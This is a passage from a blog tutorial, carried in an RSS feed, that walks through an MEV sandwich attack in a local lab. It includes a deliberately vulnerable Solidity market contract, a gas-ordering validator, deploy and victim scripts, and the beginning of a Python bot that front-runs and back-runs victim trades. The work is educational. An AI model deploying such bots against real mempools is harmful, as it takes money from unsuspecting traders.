-   **DecentralizedBank Exploit** - A Case Study on Integer Underflow Vulnerabilities. &quot;Custom Analysis.&quot; Available as described in this article.</content:encoded><author>Ruben Santos</author></item><item><title>From Front-Running to Sandwich Attacks: An Advanced Look at MEV Exploits</title><link>https://www.kayssel.com/post/web3-7</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-7</guid><description>In this chapter, we explored the mechanics of Sandwich Attacks using a vulnerable smart contract. We deployed the contract, simulated a victim&apos;s transaction, and automated the attack with a Python bot. Key takeaways include understanding slippage, private relayers, and dynamic pricing as defenses.</description><pubDate>Sun, 22 Dec 2024 10:31:33 GMT</pubDate><content:encoded># Introduction

In previous chapters, [we explored the fundamentals of front-running,](https://www.kayssel.com/post/web3-5/) a type of attack where malicious actors exploit transaction ordering to gain an advantage. These tactics fall under a broader category known as **MEV (Maximal Extractable Value) attacks**, which involve manipulating the sequence of transactions in a blockchain to extract value. Today, we’re diving deeper into a specific and more advanced MEV strategy: the **Sandwich Attack**. This sophisticated method combines front-running and back-running to manipulate prices and maximize profits, often targeting decentralized exchanges (DEXs) and other Ethereum-based markets.

To truly understand the implications of a Sandwich Attack, we won’t just analyze its theory. Instead, we’ll recreate the scenario from the ground up—deploying a vulnerable contract, simulating a victim’s transaction, and leveraging a custom bot to execute the attack. Along the way, we’ll use familiar tools like **Anvil** to simulate the network, **Cast** for contract deployment and interaction, and a **Python-based bot** to automate the attack process.

By the end of this chapter, you’ll have a clear understanding of how these attacks are orchestrated, the level of sophistication involved, and, most importantly, the need for robust countermeasures in decentralized ecosystems.

# **What is a Sandwich Attack?**

Imagine you’re at a busy market, and you notice someone ahead of you about to buy the last few apples from a vendor. Knowing this, you quickly cut in line, buy the apples first, and then sell them back to that same person at a marked-up price. This, in essence, is how a Sandwich Attack works, but instead of apples, the &quot;market&quot; here is a decentralized exchange, and the &quot;line&quot; is the blockchain transaction queue.

A Sandwich Attack is a clever combination of two tactics: front-running and back-running. Here’s how it plays out:

1.  **Front-Running**: The attacker monitors the mempool (a holding area for unconfirmed transactions) and spots a pending trade, such as a token purchase. They quickly submit their own transaction—a buy order with a higher gas fee—so it gets executed first. This increases the token price before the victim’s transaction can be processed.
2.  **Victim’s Transaction**: The unsuspecting victim executes their trade, buying tokens at the now-inflated price, unaware they’ve been front-run.
3.  **Back-Running**: Immediately after the victim’s transaction is confirmed, the attacker places a sell order. By selling the tokens they just purchased at the higher price created by the victim’s trade, the attacker pockets the profit.

This strategy takes advantage of the mempool’s transparency and the predictable way blockchain transactions are prioritized by gas fees. The result is a &quot;sandwich,&quot; where the victim’s transaction is squeezed between the attacker’s buy and sell orders, leaving the victim with inflated costs and the attacker with a tidy profit.

```mermaid
sequenceDiagram
    participant Attacker
    participant Victim
    participant AMM as Automated Market Maker (AMM)

    Note over Attacker: Scans mempool for pending transactions
    Victim-&gt;&gt;AMM: Places buy order for tokens&lt;br&gt;(e.g., 10 tokens)
    AMM--&gt;&gt;Victim: Pending transaction&lt;br&gt;(Price impact: +0.01 ETH/token)
    Attacker-&gt;&gt;AMM: Front-run buy order&lt;br&gt;(e.g., 15 tokens)&lt;br&gt;Higher gas price
    AMM--&gt;&gt;Attacker: Order confirmed&lt;br&gt;(Price impact: +0.015 ETH/token)
    Victim-&gt;&gt;AMM: Victim&apos;s transaction executes&lt;br&gt;(Buys 10 tokens at inflated price)
    AMM--&gt;&gt;Victim: Order confirmed
    Attacker-&gt;&gt;AMM: Back-run sell order&lt;br&gt;(e.g., 15 tokens)&lt;br&gt;Profiting from price inflation
    AMM--&gt;&gt;Attacker: Tokens sold at inflated price
    Note over Attacker: Gains profit from the inflated price difference

```

Today, as we usually do, we’ll dive into a vulnerable contract designed for this type of attack, analyzing it using Foundry, a custom validator, and a Python bot to automate the attack.

# **Explaining the MagicPotionMarket Contract**

The `MagicPotionMarket` contract represents a dynamic marketplace where users can trade &quot;magic potions&quot; with a pricing mechanism that adjusts based on supply and demand. It’s designed as a straightforward example to explore how such markets work on the blockchain.

&lt;details&gt;
&lt;summary&gt;Vulnerable Smart Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MagicPotionMarket {
    mapping(address =&gt; uint256) public potionBalances;
    uint256 public potionPrice = 1 ether; // Base price of a magic potion in ETH

    event PotionsBought(address indexed buyer, uint256 amount, uint256 price);
    event PotionsSold(address indexed seller, uint256 amount, uint256 price);

    // Function to buy potions
    function buyPotions(uint256 amount) external payable {
        potionBalances[msg.sender] += amount;

        // Simulate price impact: the more potions bought, the higher the price
        potionPrice += (amount * 1 ether) / 100; // Increment by 0.01 ETH per potion
        require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

        emit PotionsBought(msg.sender, amount, potionPrice);
    }

    // Function to sell potions
    function sellPotions(uint256 amount) external {
        require(
            potionBalances[msg.sender] &gt;= amount,
            &quot;Not enough potions to sell&quot;
        );

        uint256 currentPrice = potionPrice; // Capture the price at the start
        potionBalances[msg.sender] -= amount;

        // Calculate the value of potions being sold
        uint256 saleValue = amount * currentPrice;

        // Simulate price drop: the more potions sold, the lower the price
        potionPrice -= (amount * 1 ether) / 100; // Decrement by 0.01 ETH per potion
        require(potionPrice &gt; 0, &quot;Potion price underflow&quot;);

        // Transfer ETH to the seller
        payable(msg.sender).transfer(saleValue);

        emit PotionsSold(msg.sender, amount, potionPrice);
    }

    // Allow the contract to receive ETH
    receive() external payable {}
}

```
&lt;/details&gt;


Let’s walk through its components step by step, with corresponding code snippets for clarity.

```solidity
mapping(address =&gt; uint256) public potionBalances;
uint256 public potionPrice = 1 ether; // Base price of a magic potion in ETH

```

At its core, the contract maintains a record of each user’s potion holdings through a mapping called `potionBalances`. Each address is associated with the number of potions it owns. The price of a potion starts at a fixed value of **1 ETH** but changes dynamically as users buy or sell potions, simulating real-world price fluctuations.

The choice to make both `potionBalances` and `potionPrice` public ensures transparency, allowing anyone to query the current state of the market.

```solidity
function buyPotions(uint256 amount) external payable {
    potionBalances[msg.sender] += amount;

    // Simulate price impact: the more potions bought, the higher the price
    potionPrice += (amount * 1 ether) / 100; // Increment by 0.01 ETH per potion
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

The `buyPotions` function is where users can increase their potion holdings. When a user calls this function and specifies an `amount`, the contract adds that number to their potion balance.

What makes this function interesting is its dynamic pricing mechanism. Each purchase increases the potion price by **0.01 ETH per potion bought**, simulating a supply-demand relationship. For instance, if someone buys 10 potions, the price rises by **0.1 ETH**.

To ensure the price doesn’t overflow due to extreme purchases, there’s a safeguard (`require(potionPrice &gt; 0)`) that halts execution if such a scenario is detected. Additionally, the function emits a `PotionsBought` event to log the purchase, making it easy to track activity.

```solidity
function sellPotions(uint256 amount) external {
    require(
        potionBalances[msg.sender] &gt;= amount,
        &quot;Not enough potions to sell&quot;
    );

    uint256 currentPrice = potionPrice; // Capture the price at the start
    potionBalances[msg.sender] -= amount;

    // Calculate the value of potions being sold
    uint256 saleValue = amount * currentPrice;

    // Simulate price drop: the more potions sold, the lower the price
    potionPrice -= (amount * 1 ether) / 100; // Decrement by 0.01 ETH per potion
    require(potionPrice &gt; 0, &quot;Potion price underflow&quot;);

    // Transfer ETH to the seller
    payable(msg.sender).transfer(saleValue);

    emit PotionsSold(msg.sender, amount, potionPrice);
}

```

The `sellPotions` function allows users to liquidate their potions for ETH. Before proceeding, the contract checks if the seller has enough potions in their balance. If they do, the specified amount is subtracted from their balance, and the corresponding ETH is transferred to their address.

Similar to the buying process, selling potions adjusts the price dynamically—but in the opposite direction. For every potion sold, the price decreases by **0.01 ETH**, reflecting reduced demand. This creates a scenario where heavy selling can significantly lower the market price, impacting subsequent trades.

To prevent issues like underflow (a situation where the price drops below zero), the function includes a safeguard: `require(potionPrice &gt; 0)`. Finally, it logs the sale with the `PotionsSold` event.

```solidity
receive() external payable {}

```

This small but essential function allows the contract to receive ETH directly, ensuring it has enough funds to pay users who sell their potions. Without this capability, the contract could run out of ETH, causing transactions to fail.

Additionally, the contract includes events:

```solidity
event PotionsBought(address indexed buyer, uint256 amount, uint256 price);
event PotionsSold(address indexed seller, uint256 amount, uint256 price);

```

These events emit key details about every transaction, such as the buyer or seller’s address, the number of potions traded, and the updated price. This transparency is valuable for monitoring the contract but also provides real-time data for anyone observing the market.

# **Setting Up the Attack Strategy**

To replicate the conditions for a **Sandwich Attack**, we’ll use a familiar setup that combines tools and strategies we’ve already discussed in previous chapters. This will streamline the process and make it easier to understand how all the pieces fit together. Here’s how we’ll proceed:

1.  **Custom Validator for Front-Running**: We’ll use the same custom validator that we introduced in [the chapter on front-running](https://www.kayssel.com/post/web3-5/). For those who are already familiar with its workings, feel free to skip ahead. In brief, this validator monitors the mempool for pending transactions, identifying opportunities to execute front-running trades by prioritizing transactions with higher gas fees.
2.  **Network Simulation with Anvil**: As we’ve been doing in previous chapters, we’ll rely on **Anvil**, the blockchain simulation tool, to create a controlled environment. Anvil lets us mimic the behavior of a real Ethereum network while giving us fine-grained control over block production, gas pricing, and more. Its flexibility makes it an ideal choice for testing complex interactions like the Sandwich Attack.
3.  **Deployment and Victim Transaction with Cast**: We’ll continue using **Cast**, which has been our go-to tool for interacting with the network in past chapters. Cast will handle the deployment of the vulnerable `MagicPotionMarket` contract and simulate a transaction from the victim. Its simplicity and efficiency make it perfect for these tasks.
4.  **Automating the Sandwich Attack with Python**: Finally, we’ll bring everything together with a Python bot. This script will monitor the network, execute the front-running and back-running transactions, and calculate the attack’s profitability. Python’s flexibility allows us to automate the entire process, simulating how an attacker would operate in a real-world scenario.

# **Custom Validator for Front-Running**

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    &lt;strong&gt;Note&lt;/strong&gt;: If you’ve already read the chapter on front-running and are familiar with how our custom validator works, you can safely skip this section. For newcomers or those needing a refresher, here’s an accessible breakdown of how it operates.
  &lt;/div&gt;
&lt;/div&gt;

The custom validator is a critical component in executing a **Sandwich Attack**, as it allows us to monitor the mempool for pending transactions and identify potential targets. This tool interacts directly with the blockchain to detect unconfirmed transactions and analyze their parameters. To include the validator in our project, we begin by organizing our attack scripts into a dedicated directory within the Foundry project. This setup keeps everything clean and accessible.

&lt;details&gt;
&lt;summary&gt;Validator Code&lt;/summary&gt;

```javascript
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connection to the Anvil node
const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);

console.log(&quot;Validator connected to Anvil&quot;);

// List to store pending transactions
let pendingTransactions = [];

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);

    if (tx) {
      console.log(&quot;\nTransaction detected:&quot;);
      console.log(`  Hash: ${tx.hash}`);
      console.log(`  From: ${tx.from}`);
      console.log(`  To: ${tx.to || &quot;Contract Deployment&quot;}`);
      console.log(`  Value: ${ethers.formatEther(tx.value)} ETH`);

      // Process the gasPrice correctly
      const gasPrice = tx.gasPrice || tx.maxFeePerGas; // Handle different types of transactions
      console.log(`  Gas Price: ${ethers.formatUnits(gasPrice, &quot;gwei&quot;)} gwei`);

      // Add the transaction to the local mempool
      pendingTransactions.push(tx);
      console.log(&quot;Transaction added to local mempool.&quot;);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

// Function to mine transactions based on priority
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    console.log(&quot;\nMining a new block...&quot;);

    // Sort transactions by `maxFeePerGas` or `gasPrice` in descending order
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.maxFeePerGas ? BigInt(a.maxFeePerGas) : BigInt(a.gasPrice);
      const gasB = b.maxFeePerGas ? BigInt(b.maxFeePerGas) : BigInt(b.gasPrice);

      // Safely compare BigInt values directly
      if (gasA &gt; gasB) return -1; // Descending order: gasA is higher
      if (gasA &lt; gasB) return 1;  // gasB is higher
      return 0; // If equal
    });

    const selectedTx = pendingTransactions.shift(); // Select the transaction with the highest priority

    // Simulate mining by calling `evm_mine`
    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);

      // Call `evm_mine` to mine a new block
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });

      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);

      // Remove the mined transaction from the pending list
      pendingTransactions = pendingTransactions.filter(
        (tx) =&gt; tx.hash !== selectedTx.hash
      );
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 5000); // Check every 5 seconds

// Listen for new blocks
provider.on(&quot;block&quot;, (blockNumber) =&gt; {
  console.log(`\nNew block mined: ${blockNumber}`);
});


```
&lt;/details&gt;


Inside the `attack` directory, we create a file named `validator.js`. Before running the script, ensure all required dependencies are installed. From the project root, we initialize a Node.js project and add the necessary packages:

```bash
npm init -y
npm install ethers axios

```

This prepares the environment for the validator to communicate with the local Anvil network and handle HTTP requests.

The validator establishes a connection to Anvil using the `ethers` library. The connection is made to the node running locally on `http://localhost:8545`. Once connected, the validator begins listening for pending transactions. Each detected transaction is analyzed to extract key details like the sender, recipient, and the value being transferred. For example, a detected transaction might show the sender&apos;s address, the amount of ETH involved, and whether it is directed at a contract or another wallet.

Here’s the section of code responsible for this behavior:

```javascript
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connect to Anvil
const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);
console.log(&quot;Validator connected to Anvil&quot;);

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);
    if (tx) {
      console.log(`Transaction detected: ${tx.hash}`);
      console.log(`From: ${tx.from}, To: ${tx.to}, Value: ${ethers.formatEther(tx.value)} ETH`);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

```

The connection to Anvil provides real-time access to the mempool. When a transaction is detected, its details are fetched and logged, giving us a live view of the blockchain’s activity.

Once transactions are collected, the validator prioritizes them based on gas price. The logic here ensures that transactions offering higher gas fees are mined first, simulating the natural behavior of miners in a real blockchain network. By sorting transactions in descending order of gas price, the validator ensures that the most profitable ones are included in the next block. The block production is then simulated by sending a command to the Anvil node, which mines the block and processes the prioritized transactions.

```solidity
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.gasPrice || a.maxFeePerGas;
      const gasB = b.gasPrice || b.maxFeePerGas;
      return gasB - gasA; // Higher gas price gets priority
    });

    const selectedTx = pendingTransactions.shift(); // Select highest-priority transaction

    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });
      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 10000);

```

Here, the validator automates the process of including transactions in blocks by calling the `evm_mine` method on the Anvil node. This step is crucial for ensuring that the front-running and back-running transactions in a Sandwich Attack are processed in the desired order.

# **Deploying the Vulnerable Contract and Simulating the Victim**

Now that we’ve set up our environment and reviewed the custom validator, the next step is to deploy the vulnerable contract (`MagicPotionMarket`) onto the local blockchain network and simulate a victim’s transaction. This process demonstrates how an attacker might observe the network and exploit specific actions.

#### **Deploying the Contract**

The deployment process is straightforward thanks to **Foundry** and its command-line tools. Using `forge create`, we compile and deploy the contract directly to the local Anvil network.

&lt;details&gt;
&lt;summary&gt;Script to deploy the contract&lt;/summary&gt;

```bash
#!/bin/bash

# Force numeric format to English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Configuration variables
RPC_URL=&quot;http://localhost:8545&quot;  # URL for the local Anvil node
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;  # Admin&apos;s private key
CONTRACT_NAME=&quot;MagicPotionMarket&quot;  # Name of the contract to be deployed
CONTRACT_PATH=&quot;src/MagicPotionMarket.sol:$CONTRACT_NAME&quot;  # Path to the contract in the project directory

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $ADMIN_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

# Check if the contract deployment was successful
if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

# Print the deployed contract address
echo &quot;Contract successfully deployed at: $CONTRACT_ADDRESS&quot;

# Save the contract address to a file for future reference
echo &quot;$CONTRACT_ADDRESS&quot; &gt; deployed_contract_address.txt
echo &quot;Contract address saved to &apos;deployed_contract_address.txt&apos;.&quot;

# Optionally, check the initial balance of the deployed contract
echo &quot;Checking the initial contract balance...&quot;
contract_balance=$(cast balance $CONTRACT_ADDRESS --rpc-url $RPC_URL)

# Convert the contract balance to ETH for readability
contract_balance_eth=$(awk &quot;BEGIN {print $contract_balance / 10^18}&quot;)
echo &quot;Initial contract balance: $contract_balance_eth ETH&quot;

```
&lt;/details&gt;


Let’s break down the deployment script.

```bash
#!/bin/bash

# Force numeric format to use English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;  # Anvil node URL
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;  # Admin private key
CONTRACT_NAME=&quot;MagicPotionMarket&quot;  # Contract name
CONTRACT_PATH=&quot;src/MagicPotionMarket.sol:$CONTRACT_NAME&quot;  # Path to the contract

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

```

Here, the script sets up the environment by defining the RPC URL for the Anvil node and the admin’s private key. The contract source path is specified using the `CONTRACT_PATH` variable.

The `forge build` command compiles the contract, ensuring it’s ready for deployment.

```bash
# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $ADMIN_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Contract deployment failed.&quot;
    exit 1
fi

```

The `forge create` command deploys the contract to the blockchain. The script extracts the deployed contract address and stores it in the `CONTRACT_ADDRESS` variable. If deployment fails, the script halts with an error message.

```bash
echo &quot;Contract deployed successfully at: $CONTRACT_ADDRESS&quot;

# Save the contract address to a file for later use
echo &quot;$CONTRACT_ADDRESS&quot; &gt; deployed_contract_address.txt
echo &quot;Contract address saved to &apos;deployed_contract_address.txt&apos;.&quot;

# Optional: Verify the contract&apos;s initial balance
echo &quot;Checking the initial contract balance...&quot;
contract_balance=$(cast balance $CONTRACT_ADDRESS --rpc-url $RPC_URL)
contract_balance_eth=$(awk &quot;BEGIN {print $contract_balance / 10^18}&quot;)
echo &quot;Initial contract balance: $contract_balance_eth ETH&quot;


```

For convenience, the contract’s address is saved to a file, making it easy to reference in subsequent scripts. The initial balance of the contract can also be verified using the `cast balance` command.

#### **Victim Transaction Simulation**

Once the contract is deployed, the next step is simulating a victim’s transaction. This involves purchasing 15 potions, creating predictable price changes that the attacker can exploit.

&lt;details&gt;
&lt;summary&gt;Victim Simulation Code&lt;/summary&gt;

```bash
#!/bin/bash

# Forzar el formato de números en inglés (punto como separador decimal)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
CONTRACT_ADDRESS=&quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;

# Player buys potions
echo &quot;Player buying potions...&quot;
CURRENT_PRICE=$(cast call $CONTRACT_ADDRESS &quot;potionPrice()&quot; --rpc-url $RPC_URL)

# Convert CURRENT_PRICE to decimal (BigInt handling)
CURRENT_PRICE=$(echo $CURRENT_PRICE | sed &apos;s/0x//g&apos;)
CURRENT_PRICE_DECIMAL=$(printf &quot;%d&quot; &quot;0x$CURRENT_PRICE&quot;)

# Validate CURRENT_PRICE_DECIMAL
if [ &quot;$CURRENT_PRICE_DECIMAL&quot; -le 0 ]; then
    echo &quot;Error: Invalid potion price detected: $CURRENT_PRICE_DECIMAL Wei&quot;
    exit 1
fi

echo &quot;Precio actual de la pocion (Wei): $CURRENT_PRICE_DECIMAL&quot;

PLAYER_PURCHASE_AMOUNT=10

# Use `bc` for big number calculations
TOTAL_COST=$(echo &quot;$PLAYER_PURCHASE_AMOUNT * $CURRENT_PRICE_DECIMAL&quot; | bc)
TOTAL_COST_ETH=$(echo &quot;scale=18; $TOTAL_COST / 10^18&quot; | bc)

# Validate TOTAL_COST
if [ &quot;$TOTAL_COST&quot; -le 0 ]; then
    echo &quot;Error: Invalid total cost calculated: $TOTAL_COST Wei&quot;
    exit 1
fi

echo &quot;Player buying $PLAYER_PURCHASE_AMOUNT potions for $TOTAL_COST_ETH ETH...&quot;

# Send transaction
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value $TOTAL_COST \
          &quot;buyPotions(uint256)&quot; $PLAYER_PURCHASE_AMOUNT

if [ $? -eq 0 ]; then
    echo &quot;Potion purchase completed by player.&quot;
else
    echo &quot;Error: Potion purchase failed.&quot;
    exit 1
fi

# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(echo &quot;scale=4; $admin_balance / 10^18&quot; | bc)
player_eth=$(echo &quot;scale=4; $player_balance / 10^18&quot; | bc)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;


```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Below is the script for this step:&lt;/summary&gt;

```solidity
#!/bin/bash

# Force numeric format to use English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;  # Anvil node URL
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;  # Victim&apos;s private key
CONTRACT_ADDRESS=&quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;  # Contract address

```
&lt;/details&gt;


The script initializes the victim’s private key and references the previously deployed contract’s address.

```solidity
# Retrieve the current potion price
echo &quot;Player buying potions...&quot;
CURRENT_PRICE=$(cast call $CONTRACT_ADDRESS &quot;potionPrice()&quot; --rpc-url $RPC_URL)

# Convert CURRENT_PRICE to decimal (BigInt handling)
CURRENT_PRICE=$(echo $CURRENT_PRICE | sed &apos;s/0x//g&apos;)
CURRENT_PRICE_DECIMAL=$(printf &quot;%d&quot; &quot;0x$CURRENT_PRICE&quot;)

# Validate CURRENT_PRICE_DECIMAL
if [ &quot;$CURRENT_PRICE_DECIMAL&quot; -le 0 ]; then
    echo &quot;Error: Invalid potion price detected: $CURRENT_PRICE_DECIMAL Wei&quot;
    exit 1
fi

echo &quot;Current potion price (Wei): $CURRENT_PRICE_DECIMAL&quot;

```

Using `cast call`, the script fetches the current potion price from the contract. The price, returned in hexadecimal, is converted into decimal for further calculations. The script ensures the price is valid before proceeding.

```solidity
PLAYER_PURCHASE_AMOUNT=10  # Amount of potions to buy

# Calculate the total cost using `bc` for big number calculations
TOTAL_COST=$(echo &quot;$PLAYER_PURCHASE_AMOUNT * $CURRENT_PRICE_DECIMAL&quot; | bc)
TOTAL_COST_ETH=$(echo &quot;scale=18; $TOTAL_COST / 10^18&quot; | bc)

# Validate TOTAL_COST
if [ &quot;$TOTAL_COST&quot; -le 0 ]; then
    echo &quot;Error: Invalid total cost calculated: $TOTAL_COST Wei&quot;
    exit 1
fi

echo &quot;Player buying $PLAYER_PURCHASE_AMOUNT potions for $TOTAL_COST_ETH ETH...&quot;

```

The total cost for purchasing 10 potions is calculated using `bc`, which handles large numbers precisely. The cost is then validated to ensure it is a valid value.

```solidity
# Send the transaction
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value $TOTAL_COST \
          &quot;buyPotions(uint256)&quot; $PLAYER_PURCHASE_AMOUNT

if [ $? -eq 0 ]; then
    echo &quot;Potion purchase completed by player.&quot;
else
    echo &quot;Error: Potion purchase failed.&quot;
    exit 1
fi

```

The victim’s transaction is sent using `cast send`. The script calls the `buyPotions` function on the contract, passing the calculated total cost and the number of potions to purchase.

```solidity
# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(echo &quot;scale=4; $admin_balance / 10^18&quot; | bc)
player_eth=$(echo &quot;scale=4; $player_balance / 10^18&quot; | bc)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;

```

After the transaction, the script fetches and displays the final balances of both the victim and the admin. This provides a clear snapshot of the state after the victim’s trade.

# **Automating the Sandwich Attack with Python**

Now that we have the vulnerable contract deployed and the victim’s transaction simulated, it’s time to automate the Sandwich Attack using a Python bot.

&lt;details&gt;
&lt;summary&gt;Python Bot&lt;/summary&gt;

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connect to the local blockchain network
ganache_url = &quot;http://127.0.0.1:8545&quot;  # Local Anvil node
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check if the connection is successful
if not web3.is_connected():
    print(&quot;Error: Could not connect to the network.&quot;)
else:
    print(&quot;Connection established with the local network.&quot;)

# %% Cell 2
# Load the contract configuration and attacker details
CONTRACT_ADDRESS = &quot;0xCf7Ed3AccA5a467e9e704C703E8D87F634fB0Fc9&quot;  # Replace with your deployed contract address
with open(&quot;./out/MagicPotionMarket.sol/MagicPotionMarket.json&quot;) as f:
    contract_json = json.load(f)
    CONTRACT_ABI = contract_json[&quot;abi&quot;]

# Initialize the contract
potion_contract = web3.eth.contract(address=CONTRACT_ADDRESS, abi=CONTRACT_ABI)

# Attacker configuration
ATTACKER = {
    &quot;address&quot;: &quot;0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC&quot;,  # Attacker&apos;s address
    &quot;private_key&quot;: &quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;  # Attacker&apos;s private key
}

# Parameters for the attack
GAS_PRICE_MULTIPLIER = 1.5  # Multiplier for gas price during front-running
POTION_THRESHOLD = 5        # Minimum number of potions for a transaction to be interesting

print(&quot;Contract initialized and attacker configured.&quot;)

# %% Cell 3
# Helper functions to interact with the blockchain
def build_signed_tx(function_call, gas_price, value=0):
    &quot;&quot;&quot;
    Build and sign a transaction.
    &quot;&quot;&quot;
    tx = function_call.build_transaction({
        &apos;from&apos;: ATTACKER[&quot;address&quot;],
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: gas_price,
        &apos;nonce&apos;: web3.eth.get_transaction_count(ATTACKER[&quot;address&quot;]),
        &apos;value&apos;: int(value)  # Ensure the value is an integer
    })
    signed_tx = web3.eth.account.sign_transaction(tx, ATTACKER[&quot;private_key&quot;])
    return signed_tx

def send_tx(signed_tx):
    &quot;&quot;&quot;
    Send a signed transaction and wait for its receipt.
    &quot;&quot;&quot;
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

# %% Cell 4
# Monitor the mempool and execute the Sandwich Attack
def monitor_mempool_and_attack():
    print(&quot;Monitoring the mempool for interesting transactions...&quot;)
    pending_filter = web3.eth.filter(&quot;pending&quot;)

    # Track the attacker&apos;s initial balance
    initial_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])

    while True:
        try:
            pending_txs = pending_filter.get_new_entries()
            for tx_hash in pending_txs:
                tx = web3.eth.get_transaction(tx_hash)

                # Ignore transactions from the attacker
                if tx[&quot;from&quot;].lower() == ATTACKER[&quot;address&quot;].lower():
                    continue

                # Check if the transaction interacts with the target contract
                if tx[&quot;to&quot;] == CONTRACT_ADDRESS:
                    decoded_input = potion_contract.decode_function_input(tx[&quot;input&quot;])
                    function_name = decoded_input[0].fn_name
                    args = decoded_input[1]

                    if function_name == &quot;buyPotions&quot; and args[&quot;amount&quot;] &gt;= POTION_THRESHOLD:
                        print(f&quot;Interesting transaction detected: {tx_hash.hex()} | {args[&apos;amount&apos;]} potions&quot;)

                        # Fetch the current potion price
                        potion_price = potion_contract.functions.potionPrice().call()
                        print(f&quot;Current potion price (Wei): {potion_price}&quot;)

                        # Calculate potential profit without the attack
